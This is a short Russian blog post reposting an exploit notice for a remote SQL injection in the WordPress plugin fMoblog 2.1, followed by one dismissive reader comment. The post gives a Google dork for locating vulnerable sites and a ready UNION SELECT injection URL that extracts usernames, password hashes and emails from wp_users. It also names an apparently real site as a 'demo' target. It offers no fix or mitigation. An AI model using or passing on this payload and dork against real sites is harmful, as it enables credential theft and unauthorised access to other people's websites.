• Авторизация


Уязвимость в плагине вордпресса fMoblog 11-04-2009 02:12 к комментариям - к полной версии - понравилось!


#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

вверх^ к полной версии понравилось! в evernote
Комментарии (1):
Humiliating 11-04-2009-11:36 удалить
Нефиг юзать кривые плагины!


Комментарии (1): вверх^

Вы сейчас не можете прокомментировать это сообщение.

Дневник Уязвимость в плагине вордпресса fMoblog | Alex_r00k - Дневник Alex_r00k | Лента друзей Alex_r00k / Полная версия Добавить в друзья Страницы: раньше»